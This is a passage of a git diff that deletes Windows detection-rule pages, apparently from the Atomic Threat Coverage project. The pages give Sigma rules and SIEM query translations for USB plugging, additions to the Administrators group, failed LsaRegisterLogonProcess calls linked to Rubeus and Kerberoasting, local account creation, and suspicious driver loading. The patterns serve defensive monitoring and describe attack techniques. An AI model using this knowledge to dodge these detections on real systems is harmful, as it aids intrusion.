-Get-WinEvent -LogName Microsoft-Windows-DriverFrameworks-UserMode/Operational | where {(($_.ID -eq "2003" -or $_.ID -eq "2100" -or $_.ID -eq "2102")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-DriverFrameworks\-UserMode\/Operational" AND winlog.event_id:("2003" OR "2100" OR "2102"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1a4bd6e3-4c6e-405d-a9a3-53a116e341d4 <<EOF
-{
-  "metadata": {
-    "title": "USB Device Plugged",
-    "description": "Detects plugged USB devices",
-    "tags": [
-      "attack.initial_access",
-      "attack.t1200"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-DriverFrameworks\\-UserMode\\/Operational\" AND winlog.event_id:(\"2003\" OR \"2100\" OR \"2102\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-DriverFrameworks\\-UserMode\\/Operational\" AND winlog.event_id:(\"2003\" OR \"2100\" OR \"2102\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'USB Device Plugged'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("2003" "2100" "2102")
-```
-
-
-### splunk
-    
-```
-(source="Microsoft-Windows-DriverFrameworks-UserMode/Operational" (EventCode="2003" OR EventCode="2100" OR EventCode="2102"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-DriverFrameworks-UserMode/Operational" event_id IN ["2003", "2100", "2102"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*2003|.*2100|.*2102)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_user_added_to_local_administrators.md b/Atomic_Threat_Coverage/Detection_Rules/win_user_added_to_local_administrators.md
deleted file mode 100644
index 980aff2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_user_added_to_local_administrators.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | User Added to Local Administrators       |
-|:-------------------------|:------------------|
-| **Description**          | This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrative activity</li></ul>  |
-| **Development Status**   | stable |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: User Added to Local Administrators
-id: c265cf08-3f99-46c1-8d59-328247057d57
-description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation
-    activity
-status: stable
-author: Florian Roth
-date: 2017/03/14
-tags:
-    - attack.privilege_escalation
-    - attack.t1078
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4732
-    selection_group1:
-        GroupName: 'Administrators'
-    selection_group2:
-        GroupSid: 'S-1-5-32-544'
-    filter:
-        SubjectUserName: '*$'
-    condition: selection and (1 of selection_group*) and not filter
-falsepositives:
-    - Legitimate administrative activity
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4732" -and ($_.message -match "GroupName.*Administrators" -or $_.message -match "GroupSid.*S-1-5-32-544")) -and  -not ($_.message -match "SubjectUserName.*.*$")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4732" AND winlog.channel:"Security" AND (winlog.event_data.GroupName:"Administrators" OR winlog.event_data.GroupSid:"S\-1\-5\-32\-544")) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c265cf08-3f99-46c1-8d59-328247057d57 <<EOF
-{
-  "metadata": {
-    "title": "User Added to Local Administrators",
-    "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4732\" AND winlog.channel:\"Security\" AND (winlog.event_data.GroupName:\"Administrators\" OR winlog.event_data.GroupSid:\"S\\-1\\-5\\-32\\-544\")) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4732\" AND winlog.channel:\"Security\" AND (winlog.event_data.GroupName:\"Administrators\" OR winlog.event_data.GroupSid:\"S\\-1\\-5\\-32\\-544\")) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'User Added to Local Administrators'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4732" AND (GroupName:"Administrators" OR GroupSid:"S\-1\-5\-32\-544")) AND (NOT (SubjectUserName.keyword:*$)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4732" source="WinEventLog:Security" (GroupName="Administrators" OR GroupSid="S-1-5-32-544")) NOT (SubjectUserName="*$"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4732" event_source="Microsoft-Windows-Security-Auditing" (group_name="Administrators" OR group_sid="S-1-5-32-544"))  -(SubjectUserName="*$"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4732)(?=.*(?:.*(?:.*Administrators|.*S-1-5-32-544)))))(?=.*(?!.*(?:.*(?=.*.*\$)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.md b/Atomic_Threat_Coverage/Detection_Rules/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.md
deleted file mode 100644
index c5f6a8b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'       |
-|:-------------------------|:------------------|
-| **Description**          | The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)</li></ul>  |
-| **Author**               | Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community |
-| Other Tags           | <ul><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
-id: 6daac7fc-77d1-449a-a71a-e6b4d59a0e54
-description: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
-status: experimental
-references:
-    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
-tags:
-    - attack.lateral_movement
-    - attack.privilege_escalation
-    - attack.t1208
-    - attack.t1558.003
-author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
-date: 2019/10/24
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        - EventID: 4673
-          Service: 'LsaRegisterLogonProcess()'
-          Keywords: '0x8010000000000000'     #failure
-    condition: selection
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4673" -and $_.message -match "Service.*LsaRegisterLogonProcess()" -and $_.message -match "Keywords.*0x8010000000000000") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4673" AND Service:"LsaRegisterLogonProcess\(\)" AND Keywords:"0x8010000000000000")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6daac7fc-77d1-449a-a71a-e6b4d59a0e54 <<EOF
-{
-  "metadata": {
-    "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'",
-    "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.privilege_escalation",
-      "attack.t1208",
-      "attack.t1558.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4673\" AND Service:\"LsaRegisterLogonProcess\\(\\)\" AND Keywords:\"0x8010000000000000\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4673\" AND Service:\"LsaRegisterLogonProcess\\(\\)\" AND Keywords:\"0x8010000000000000\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess''",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4673" AND Service:"LsaRegisterLogonProcess\(\)" AND Keywords:"0x8010000000000000")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4673" Service="LsaRegisterLogonProcess()" Keywords="0x8010000000000000")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4673" Service="LsaRegisterLogonProcess()" Keywords="0x8010000000000000")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4673)(?=.*LsaRegisterLogonProcess\(\))(?=.*0x8010000000000000))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_user_creation.md b/Atomic_Threat_Coverage/Detection_Rules/win_user_creation.md
deleted file mode 100644
index 9e9e6f0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_user_creation.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Local User Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1136: Create Account](https://attack.mitre.org/techniques/T1136)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Domain Controller Logs</li><li>Local accounts managed by privileged account management tools</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/](https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/)</li></ul>  |
-| **Author**               | Patrick Bareiss |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Local User Creation
-id: 66b6be3d-55d0-4f47-9855-d69df21740ea
-description: Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows
-    server logs and not on your DC logs.
-status: experimental
-tags:
-    - attack.persistence
-    - attack.t1136
-references:
-    - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
-author: Patrick Bareiss
-date: 2019/04/18
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4720
-    condition: selection
-fields:
-    - EventCode
-    - AccountName
-    - AccountDomain
-falsepositives:
-    - Domain Controller Logs
-    - Local accounts managed by privileged account management tools
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4720") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4720")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/66b6be3d-55d0-4f47-9855-d69df21740ea <<EOF
-{
-  "metadata": {
-    "title": "Local User Creation",
-    "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.",
-    "tags": [
-      "attack.persistence",
-      "attack.t1136"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4720\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4720\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Local User Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n    EventCode = {{_source.EventCode}}\n  AccountName = {{_source.AccountName}}\nAccountDomain = {{_source.AccountDomain}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:"4720"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4720") | table EventCode,AccountName,AccountDomain
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4720")
-```
-
-
-### grep
-    
-```
-grep -P '^4720'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_user_driver_loaded.md b/Atomic_Threat_Coverage/Detection_Rules/win_user_driver_loaded.md
deleted file mode 100644
index 7c9f6f9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_user_driver_loaded.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Suspicious Driver Loaded By User       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>{'Other legimate tools loading drivers. There are some': 'Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers.'}</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/](https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673)</li></ul>  |
-| **Author**               | xknow (@xknow_infosec), xorxes (@xor_xes) |
-| Other Tags           | <ul><li>attack.t1562.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Driver Loaded By User
-id: f63508a0-c809-4435-b3be-ed819394d612
-description: Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
-status: experimental
-references:
-    - https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673
-tags:
-    - attack.t1089
-    - attack.defense_evasion
-    - attack.t1562.001
-date: 2019/04/08
-author: xknow (@xknow_infosec), xorxes (@xor_xes)
-logsource:
-    product: windows
-    service: security
-detection:
-    selection_1:
-        EventID: 4673
-        PrivilegeList: 'SeLoadDriverPrivilege'
-        Service: '-'
-    selection_2:
-        ProcessName|contains:
-            - '*\Windows\System32\Dism.exe'
-            - '*\Windows\System32\rundll32.exe'
-            - '*\Windows\System32\fltMC.exe'
-            - '*\Windows\HelpPane.exe'
-            - '*\Windows\System32\mmc.exe'
-            - '*\Windows\System32\svchost.exe'
-            - '*\Windows\System32\wimserv.exe'
-            - '*\procexp64.exe'
-            - '*\procexp.exe'
-            - '*\procmon64.exe'
-            - '*\procmon.exe'
-            - '*\Google\Chrome\Application\chrome.exe'
-    condition: selection_1 and not selection_2
-falsepositives:
-    - Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4673" -and $_.message -match "PrivilegeList.*SeLoadDriverPrivilege" -and $_.message -match "Service.*-") -and  -not (($_.message -match "ProcessName.*.*\\Windows\\System32\\Dism.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\System32\\rundll32.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\System32\\fltMC.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\HelpPane.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\System32\\mmc.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\System32\\svchost.exe.*" -or $_.message -match "ProcessName.*.*\\Windows\\System32\\wimserv.exe.*" -or $_.message -match "ProcessName.*.*\\procexp64.exe.*" -or $_.message -match "ProcessName.*.*\\procexp.exe.*" -or $_.message -match "ProcessName.*.*\\procmon64.exe.*" -or $_.message -match "ProcessName.*.*\\procmon.exe.*" -or $_.message -match "ProcessName.*.*\\Google\\Chrome\\Application\\chrome.exe.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4673" AND PrivilegeList:"SeLoadDriverPrivilege" AND Service:"\-") AND (NOT (winlog.event_data.ProcessName.keyword:(*\\Windows\\System32\\Dism.exe* OR *\\Windows\\System32\\rundll32.exe* OR *\\Windows\\System32\\fltMC.exe* OR *\\Windows\\HelpPane.exe* OR *\\Windows\\System32\\mmc.exe* OR *\\Windows\\System32\\svchost.exe* OR *\\Windows\\System32\\wimserv.exe* OR *\\procexp64.exe* OR *\\procexp.exe* OR *\\procmon64.exe* OR *\\procmon.exe* OR *\\Google\\Chrome\\Application\\chrome.exe*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f63508a0-c809-4435-b3be-ed819394d612 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Driver Loaded By User",
-    "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.",
-    "tags": [
-      "attack.t1089",
-      "attack.defense_evasion",
-      "attack.t1562.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4673\" AND PrivilegeList:\"SeLoadDriverPrivilege\" AND Service:\"\\-\") AND (NOT (winlog.event_data.ProcessName.keyword:(*\\\\Windows\\\\System32\\\\Dism.exe* OR *\\\\Windows\\\\System32\\\\rundll32.exe* OR *\\\\Windows\\\\System32\\\\fltMC.exe* OR *\\\\Windows\\\\HelpPane.exe* OR *\\\\Windows\\\\System32\\\\mmc.exe* OR *\\\\Windows\\\\System32\\\\svchost.exe* OR *\\\\Windows\\\\System32\\\\wimserv.exe* OR *\\\\procexp64.exe* OR *\\\\procexp.exe* OR *\\\\procmon64.exe* OR *\\\\procmon.exe* OR *\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4673\" AND PrivilegeList:\"SeLoadDriverPrivilege\" AND Service:\"\\-\") AND (NOT (winlog.event_data.ProcessName.keyword:(*\\\\Windows\\\\System32\\\\Dism.exe* OR *\\\\Windows\\\\System32\\\\rundll32.exe* OR *\\\\Windows\\\\System32\\\\fltMC.exe* OR *\\\\Windows\\\\HelpPane.exe* OR *\\\\Windows\\\\System32\\\\mmc.exe* OR *\\\\Windows\\\\System32\\\\svchost.exe* OR *\\\\Windows\\\\System32\\\\wimserv.exe* OR *\\\\procexp64.exe* OR *\\\\procexp.exe* OR *\\\\procmon64.exe* OR *\\\\procmon.exe* OR *\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Driver Loaded By User'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4673" AND PrivilegeList:"SeLoadDriverPrivilege" AND Service:"\-") AND (NOT (ProcessName.keyword:(*\\Windows\\System32\\Dism.exe* *\\Windows\\System32\\rundll32.exe* *\\Windows\\System32\\fltMC.exe* *\\Windows\\HelpPane.exe* *\\Windows\\System32\\mmc.exe* *\\Windows\\System32\\svchost.exe* *\\Windows\\System32\\wimserv.exe* *\\procexp64.exe* *\\procexp.exe* *\\procmon64.exe* *\\procmon.exe* *\\Google\\Chrome\\Application\\chrome.exe*))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4673" PrivilegeList="SeLoadDriverPrivilege" Service="-") NOT ((ProcessName="*\\Windows\\System32\\Dism.exe*" OR ProcessName="*\\Windows\\System32\\rundll32.exe*" OR ProcessName="*\\Windows\\System32\\fltMC.exe*" OR ProcessName="*\\Windows\\HelpPane.exe*" OR ProcessName="*\\Windows\\System32\\mmc.exe*" OR ProcessName="*\\Windows\\System32\\svchost.exe*" OR ProcessName="*\\Windows\\System32\\wimserv.exe*" OR ProcessName="*\\procexp64.exe*" OR ProcessName="*\\procexp.exe*" OR ProcessName="*\\procmon64.exe*" OR ProcessName="*\\procmon.exe*" OR ProcessName="*\\Google\\Chrome\\Application\\chrome.exe*")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4673" PrivilegeList="SeLoadDriverPrivilege" Service="-")  -(ProcessName IN ["*\\Windows\\System32\\Dism.exe*", "*\\Windows\\System32\\rundll32.exe*", "*\\Windows\\System32\\fltMC.exe*", "*\\Windows\\HelpPane.exe*", "*\\Windows\\System32\\mmc.exe*", "*\\Windows\\System32\\svchost.exe*", "*\\Windows\\System32\\wimserv.exe*", "*\\procexp64.exe*", "*\\procexp.exe*", "*\\procmon64.exe*", "*\\procmon.exe*", "*\\Google\\Chrome\\Application\\chrome.exe*"]))
-```
-
-
-### grep
-    
-```
